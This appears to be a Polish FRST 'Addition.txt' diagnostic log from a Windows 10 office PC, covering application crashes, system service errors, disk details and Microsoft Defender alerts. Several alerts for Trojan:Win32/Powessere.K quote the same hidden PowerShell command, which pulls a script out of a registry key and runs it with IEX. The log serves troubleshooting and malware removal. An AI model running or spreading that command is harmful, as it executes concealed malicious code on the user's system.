================== Error: (09/11/2020 10:29:48 AM) (Source: Application Hang) (EventID: 1002) (User: ) Description: Program Teams.exe w wersji 1.3.0.21759 przestał współpracować z systemem Windows i został zamknięty. Aby zobaczyć, czy jest dostępnych więcej informacji dotyczących tego problemu, sprawdź historię problemów w oknie Zabezpieczenia i konserwacja w Panelu sterowania. Identyfikator procesu: 2668 Godzina rozpoczęcia: 01d6881540210b08 Godzina zakończenia: 4294967295 Ścieżka aplikacji: C:\Users\Biuro 1\AppData\Local\Microsoft\Teams\current\Teams.exe Identyfikator raportu: f7b5e725-f292-4322-a7b0-1d30473bfbab Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji powiązanej z pakietem powodującym błąd: Typ zawieszenia: Top level window is idle Error: (09/10/2020 10:21:55 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: LUMgr.exe, wersja: 1.0.0.8, sygnatura czasowa: 0x51752a5f Nazwa modułu powodującego błąd: COMCTL32.dll, wersja: 5.82.19041.1, sygnatura czasowa: 0x5a76b319 Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x00069609 Identyfikator procesu powodującego błąd: 0x1824 Godzina uruchomienia aplikacji powodującej błąd: 0x01d6874b7174094e Ścieżka aplikacji powodującej błąd: C:\Program Files (x86)\SamsungPrinterLiveUpdateInstaller\LUMgr.exe Ścieżka modułu powodującego błąd: C:\WINDOWS\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1_none_92e69152510a8cb1\COMCTL32.dll Identyfikator raportu: 1d53337a-ca9e-4e0a-bc83-c68e058ee379 Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: Error: (09/10/2020 08:06:20 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: svchost.exe_wuauserv, wersja: 10.0.19041.1, sygnatura czasowa: 0x7f0c4c00 Nazwa modułu powodującego błąd: FlightSettings.dll, wersja: 10.0.19041.423, sygnatura czasowa: 0x3d78b989 Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x0000000000007f78 Identyfikator procesu powodującego błąd: 0x1034 Godzina uruchomienia aplikacji powodującej błąd: 0x01d6873879885135 Ścieżka aplikacji powodującej błąd: C:\WINDOWS\system32\svchost.exe Ścieżka modułu powodującego błąd: C:\WINDOWS\System32\FlightSettings.dll Identyfikator raportu: 02e95a45-7b74-46c0-b970-b35507d16749 Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: Error: (09/10/2020 08:06:14 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: TiWorker.exe, wersja: 10.0.19041.441, sygnatura czasowa: 0xe399ff21 Nazwa modułu powodującego błąd: ntdll.dll, wersja: 10.0.19041.423, sygnatura czasowa: 0x06701e03 Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x00000000000a5c15 Identyfikator procesu powodującego błąd: 0x2c84 Godzina uruchomienia aplikacji powodującej błąd: 0x01d687387adfd171 Ścieżka aplikacji powodującej błąd: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.441_none_e753a4f1261e4901\TiWorker.exe Ścieżka modułu powodującego błąd: C:\WINDOWS\SYSTEM32\ntdll.dll Identyfikator raportu: c72812f4-9c54-49b5-b898-3844ae0ec48c Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: Error: (09/10/2020 07:51:50 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: CompatTelRunner.exe, wersja: 10.0.19041.1, sygnatura czasowa: 0x02ad91f5 Nazwa modułu powodującego błąd: RPCRT4.dll, wersja: 10.0.19041.1, sygnatura czasowa: 0x95fb1254 Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x000000000006a8ce Identyfikator procesu powodującego błąd: 0x2364 Godzina uruchomienia aplikacji powodującej błąd: 0x01d687367a5ea3e6 Ścieżka aplikacji powodującej błąd: C:\WINDOWS\system32\CompatTelRunner.exe Ścieżka modułu powodującego błąd: C:\WINDOWS\System32\RPCRT4.dll Identyfikator raportu: c8e951c7-ecf0-4435-ab3d-8ae84602d9d6 Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: Error: (09/10/2020 07:50:05 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: svchost.exe_wuauserv, wersja: 10.0.19041.1, sygnatura czasowa: 0x7f0c4c00 Nazwa modułu powodującego błąd: ntdll.dll, wersja: 10.0.19041.423, sygnatura czasowa: 0x06701e03 Kod wyjątku: 0xc0000374 Przesunięcie błędu: 0x00000000000fed79 Identyfikator procesu powodującego błąd: 0x274 Godzina uruchomienia aplikacji powodującej błąd: 0x01d686a75b9e3d35 Ścieżka aplikacji powodującej błąd: C:\WINDOWS\system32\svchost.exe Ścieżka modułu powodującego błąd: C:\WINDOWS\SYSTEM32\ntdll.dll Identyfikator raportu: 736089e5-9252-49c1-9875-cb547d66adda Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: Error: (09/09/2020 12:40:03 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: AcroRd32.exe, wersja: 20.12.20043.3217, sygnatura czasowa: 0x5f3ae9a9 Nazwa modułu powodującego błąd: ntdll.dll, wersja: 10.0.19041.423, sygnatura czasowa: 0x6e329152 Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x00085d5c Identyfikator procesu powodującego błąd: 0x161c Godzina uruchomienia aplikacji powodującej błąd: 0x01d6869591c7f5b4 Ścieżka aplikacji powodującej błąd: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Ścieżka modułu powodującego błąd: C:\WINDOWS\SYSTEM32\ntdll.dll Identyfikator raportu: 35fa56af-8cf7-4f6d-9153-28786443b7d3 Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: Error: (09/08/2020 11:39:00 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: svchost.exe_DPS, wersja: 10.0.19041.1, sygnatura czasowa: 0x7f0c4c00 Nazwa modułu powodującego błąd: ucrtbase.dll, wersja: 10.0.19041.423, sygnatura czasowa: 0xccf6a09c Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x0000000000048bd2 Identyfikator procesu powodującego błąd: 0xc54 Godzina uruchomienia aplikacji powodującej błąd: 0x01d685be0a4e2291 Ścieżka aplikacji powodującej błąd: C:\WINDOWS\System32\svchost.exe Ścieżka modułu powodującego błąd: C:\WINDOWS\System32\ucrtbase.dll Identyfikator raportu: 6da7e96b-1aa3-4169-b22e-2e4d9c2a1702 Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: Dziennik System: ============= Error: (09/11/2020 10:26:08 AM) (Source: SNMP) (EventID: 1500) (User: ) Description: The SNMP Service encountered an error while accessing the registry key SYSTEM\CurrentControlSet\Services\SNMP\Parameters\TrapConfiguration. Error: (09/11/2020 10:23:20 AM) (Source: SNMP) (EventID: 1500) (User: ) Description: The SNMP Service encountered an error while accessing the registry key SYSTEM\CurrentControlSet\Services\SNMP\Parameters\TrapConfiguration. Error: (09/11/2020 10:22:55 AM) (Source: DCOM) (EventID: 10005) (User: ZARZĄDZANIE NT) Description: Model DCOM odebrał błąd 1115 podczas próby uruchomienia usługi SecurityHealthService z argumentami Niedostępny w celu uruchomienia serwera: {8C9C0DB7-2CBA-40F1-AFE0-C55740DD91A0} Error: (09/11/2020 10:20:56 AM) (Source: SNMP) (EventID: 1500) (User: ) Description: The SNMP Service encountered an error while accessing the registry key SYSTEM\CurrentControlSet\Services\SNMP\Parameters\TrapConfiguration. Error: (09/11/2020 08:03:18 AM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: ZARZĄDZANIE NT) Description: Instalacja nie powiodła się: system Windows nie mógł zainstalować następującej aktualizacji, ponieważ wystąpił błąd 0x8007000d: 2020-09 Aktualizacja zbiorcza dla systemu Windows 10 Version 2004 dla systemów opartych na architekturze x64 (KB4571756). Error: (09/10/2020 09:27:59 AM) (Source: SNMP) (EventID: 1500) (User: ) Description: The SNMP Service encountered an error while accessing the registry key SYSTEM\CurrentControlSet\Services\SNMP\Parameters\TrapConfiguration. Error: (09/10/2020 09:27:37 AM) (Source: Service Control Manager) (EventID: 7024) (User: ) Description: Usługa Usługa inteligentnego transferu w tle zakończyła działanie; wystąpił następujący specyficzny dla niej błąd: %%2147943515 = Trwa proces zamykania systemu. Error: (09/10/2020 09:27:37 AM) (Source: Microsoft-Windows-Bits-Client) (EventID: 16392) (User: ZARZĄDZANIE NT) Description: Uruchomienie usługi BITS nie powiodło się. Błąd 2147943515. Windows Defender: =================================== Date: 2020-09-11 10:26:49.3270000Z Description: Produkt Program antywirusowy Microsoft Defender wykrył złośliwe oprogramowanie lub inne potencjalnie niechciane oprogramowanie. Aby uzyskać więcej informacji, zobacz: https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Powessere.K&threatid=2147734747&enterprise=0 Nazwa: Trojan:Win32/Powessere.K Identyfikator: 2147734747 Ważność: Poważny Kategoria: Koń trojański Ścieżka: CmdLine:_C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -W Hidden -Exec -nop $t=Get-ItemProperty -Path 'HKCU:\Software\Classes\nssccfile' -Name t;IEX $t.t; Pochodzenie wykrycia: Nieznane Typ wykrycia: Konkretne Źródło wykrycia: System Użytkownik: ZARZĄDZANIE NT\SYSTEM Nazwa procesu: Unknown Wersja analizy zabezpieczeń: AV: 1.323.910.0, AS: 1.323.910.0, NIS: 1.323.910.0 Wersja aparatu: AM: 1.1.17400.5, NIS: 1.1.17400.5 Date: 2020-09-11 10:26:31.8500000Z Description: Produkt Program antywirusowy Microsoft Defender wykrył złośliwe oprogramowanie lub inne potencjalnie niechciane oprogramowanie. Aby uzyskać więcej informacji, zobacz: https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Powessere.K&threatid=2147734747&enterprise=0 Nazwa: Trojan:Win32/Powessere.K Identyfikator: 2147734747 Ważność: Poważny Kategoria: Koń trojański Ścieżka: CmdLine:_C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -W Hidden -Exec -nop $t=Get-ItemProperty -Path 'HKCU:\Software\Classes\nssccfile' -Name t;IEX $t.t; Pochodzenie wykrycia: Nieznane Typ wykrycia: Konkretne Źródło wykrycia: System Użytkownik: ZARZĄDZANIE NT\SYSTEM Nazwa procesu: Unknown Wersja analizy zabezpieczeń: AV: 1.323.910.0, AS: 1.323.910.0, NIS: 1.323.910.0 Wersja aparatu: AM: 1.1.17400.5, NIS: 1.1.17400.5 Date: 2020-09-11 10:24:03.2630000Z Description: Produkt Program antywirusowy Microsoft Defender wykrył złośliwe oprogramowanie lub inne potencjalnie niechciane oprogramowanie. Aby uzyskać więcej informacji, zobacz: https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Powessere.K&threatid=2147734747&enterprise=0 Nazwa: Trojan:Win32/Powessere.K Identyfikator: 2147734747 Ważność: Poważny Kategoria: Koń trojański Ścieżka: CmdLine:_C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -W Hidden -Exec -nop $t=Get-ItemProperty -Path 'HKCU:\Software\Classes\nssccfile' -Name t;IEX $t.t; Pochodzenie wykrycia: Nieznane Typ wykrycia: Konkretne Źródło wykrycia: System Użytkownik: ZARZĄDZANIE NT\SYSTEM Nazwa procesu: Unknown Wersja analizy zabezpieczeń: AV: 1.323.910.0, AS: 1.323.910.0, NIS: 1.323.910.0 Wersja aparatu: AM: 1.1.17400.5, NIS: 1.1.17400.5 Date: 2020-09-11 10:23:44.9500000Z Description: Produkt Program antywirusowy Microsoft Defender wykrył złośliwe oprogramowanie lub inne potencjalnie niechciane oprogramowanie. Aby uzyskać więcej informacji, zobacz: https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Powessere.K&threatid=2147734747&enterprise=0 Nazwa: Trojan:Win32/Powessere.K Identyfikator: 2147734747 Ważność: Poważny Kategoria: Koń trojański Ścieżka: CmdLine:_C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -W Hidden -Exec -nop $t=Get-ItemProperty -Path 'HKCU:\Software\Classes\nssccfile' -Name t;IEX $t.t; Pochodzenie wykrycia: Nieznane Typ wykrycia: Konkretne Źródło wykrycia: System Użytkownik: ZARZĄDZANIE NT\SYSTEM Nazwa procesu: Unknown Wersja analizy zabezpieczeń: AV: 1.323.910.0, AS: 1.323.910.0, NIS: 1.323.910.0 Wersja aparatu: AM: 1.1.17400.5, NIS: 1.1.17400.5 Date: 2020-09-11 10:21:36.1320000Z Description: Produkt Program antywirusowy Microsoft Defender wykrył złośliwe oprogramowanie lub inne potencjalnie niechciane oprogramowanie. Aby uzyskać więcej informacji, zobacz: https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Powessere.K&threatid=2147734747&enterprise=0 Nazwa: Trojan:Win32/Powessere.K Identyfikator: 2147734747 Ważność: Poważny Kategoria: Koń trojański Ścieżka: CmdLine:_C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -W Hidden -Exec -nop $t=Get-ItemProperty -Path 'HKCU:\Software\Classes\nssccfile' -Name t;IEX $t.t; Pochodzenie wykrycia: Nieznane Typ wykrycia: Konkretne Źródło wykrycia: System Użytkownik: ZARZĄDZANIE NT\SYSTEM Nazwa procesu: Unknown Wersja analizy zabezpieczeń: AV: 1.323.910.0, AS: 1.323.910.0, NIS: 1.323.910.0 Wersja aparatu: AM: 1.1.17400.5, NIS: 1.1.17400.5 Date: 2020-09-01 07:49:29.3010000Z Description: Działanie aparatu Program antywirusowy Microsoft Defender zostało zakończone z powodu nieoczekiwanego błędu. Typ błędu: Awaria Kod wyjątku: 0xc0000005 Zasób: file:C:\Users\Biuro 1\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\LocalState\u_3h7ku8f8k1aatvmdcbeuni5s\c_8mb8eds39r4rmn0oveg4gg5v\a_k0d3p7ef9etr0bab3ndnhosd.def ==================== Statystyki pamięci =========================== BIOS: Dell Inc. A18 09/24/2013 Płyta główna: Dell Inc. 0J3C2F Procesor: Intel(R) Core(TM) i5-2400 CPU @ 3.10GHz Procent pamięci w użyciu: 34% Całkowita pamięć fizyczna: 8073.05 MB Dostępna pamięć fizyczna: 5290.85 MB Całkowita pamięć wirtualna: 16265.05 MB Dostępna pamięć wirtualna: 13684.51 MB ==================== Dyski ================================ Drive c: (Windows) (Fixed) (Total:232.37 GB) (Free:148.27 GB) NTFS ==>[dysk z komponentami startowymi (pozyskano odczytując BCD)] Drive e: (SYSTEM - 1) (Fixed) (Total:58.75 GB) (Free:25.36 GB) NTFS Drive f: (Smieci) (Fixed) (Total:60.48 GB) (Free:56.64 GB) NTFS \\?\Volume{8b67b4d8-0000-0000-0000-e0173a000000}\ () (Fixed) (Total:0.51 GB) (Free:0.08 GB) NTFS ==================== MBR & Tablica partycji ==================== ========================================================== Disk: 0 (Size: 232.9 GB) (Disk ID: 8B67B4D8) Partition 1: (Active) - (Size=232.4 GB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=524 MB) - (Type=27) ========================================================== Disk: 1 (MBR Code: Windows XP) (Size: 119.2 GB) (Disk ID: FFFFFFFF) Partition 1: (Active) - (Size=58.7 GB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=60.5 GB) - (Type=07 NTFS) ==================== Koniec Addition.txt =======================